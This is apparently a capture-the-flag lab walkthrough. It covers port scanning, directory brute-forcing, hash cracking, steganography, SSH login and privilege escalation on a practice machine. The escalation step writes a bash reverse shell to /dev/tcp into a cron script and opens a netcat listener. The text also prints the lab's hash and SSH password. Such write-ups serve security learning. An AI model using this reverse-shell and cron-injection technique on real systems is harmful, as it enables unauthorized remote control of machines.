In this task, we explore the fundamentals of enumeration, exploitation, and privilege escalation on a vulnerable machine. By leveraging tools like Nmap, Gobuster, cURL, John the Ripper, and Steghide, we methodically uncover hidden directories, decode encoded messages, crack hashes, and eventually gain both user and root access via SSH and a reverse shell. Each step reflects real-world techniques often used during Capture The Flag (CTF) challenges and penetration tests, helping reinforce offensive security concepts in practice.

We begin by scanning the machine to identify open ports and services, then enumerate directories to discover hidden content. From there, we crack encoded data and hashes to retrieve credentials, gain a shell on the target system, and escalate privileges to obtain both the user and root flags.

Enumeration through Nmap

Deploy the machine attached to this task and use nmap to enumerate it.

MACHINE_IP

nmap -p- -sC -sV IP_Address

Answer the questions below

1. How many ports are open?

2. What is the version of nginx?

3. What is running on the highest port? Apache

Compromising the machine

Now you've enumerated the machine, answer questions and compromise it!

Answer the questions below

1. Using GoBuster, find flag 1.

   gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt

   

   gobuster dir -u http://IP_Address/hidden/whatever/ -w /usr/share/wordlists/dirb/common.txt

   

   curl http://IP_Address/hidden/whatever/index.html

   

   using base64decode

   

2. Further enumerate the machine, what is flag 2?

   checking the robots.txt reveals this:

   

   curl http://IP_Address:65524/robots.txt

   

   According to ChatGPT: this means only the bot with User-Agent a18672860d0510e5ab6699730763b250 is allowed to crawl the site. That string is likely a key (possibly a flag, a hash, or an API token).

   Using Hashes.com:

   

3. Crack the hash with easypeasy.txt, What is the flag 3?

   curl http://IP_Address:65524/index.html reveals the flag

   

   

4. What is the hidden directory?

   there’s this hint:

   

   

5. Using the wordlist that provided to you in this task crack the hash
   what is the password?

   checking through the site on the hidden directory: http://IP_Address:65524/n0th1ng3ls3m4tt3r/ inspect the page and even when you hover over the page or image this hash is shown

   copy the hash into a file:

   echo "940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81" >> hash.txt

   

   we’ll use easypeasy.txt as provided as our wordlist

   john --wordlist=easypeasy.txt --format=gost hash.txt

   

6. What is the password to login to the machine via SSH?

   there’s binary image within the hidden folder get the url and download it locally:

   wget http://IP_Address:65524/n0th1ng3ls3m4tt3r/binarycodepixabay.jpg

   use steghide to extract hidden files

   steghide extract -sf image_name

   cat file_name.txt

   

   the content of the file is binary, use CyberChef to decode:

   

7. What is the user flag?

   in the previous step the file revealed the username which boring use ssh at port 6498 to get lower initial access.

   ssh -p 6498 boring@IP_Address password: iconvertedmypasswordtobinary

   

   in a way the user flag was encoded in ROT13 you’ll need to decode using cyberchef. I forgoot to capture the user flag but this is the final

   

8. What is the root flag?

   find / -perm user.txt 2> /dev/null

   echo "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1" >> /var/www/.mysecretcronjob.sh

   

   

On AttackBox run the listener:

nc -lvnp 4444

On the target machine run:

bash /var/www/.mysecretcronjob.sh

This challenge demonstrated the complete attack lifecycle—from initial enumeration to root-level access. Key takeaways include:

• Thorough port scanning with Nmap (-p- -sC -sV) helped reveal services running on standard and non-standard ports.

• Directory brute-forcing with Gobuster uncovered hidden paths critical to progressing.

• Using tools like CyberChef, John the Ripper, and Steghide was essential for decoding and uncovering hidden credentials or files.

• Analyzing web content like robots.txt or base64 strings helped uncover information often overlooked.

• Finally, combining SSH access and a crafted reverse shell enabled full system compromise and flag retrieval.

This task reinforces the importance of persistence, enumeration, and toolchain proficiency in real-world penetration testing and CTFs.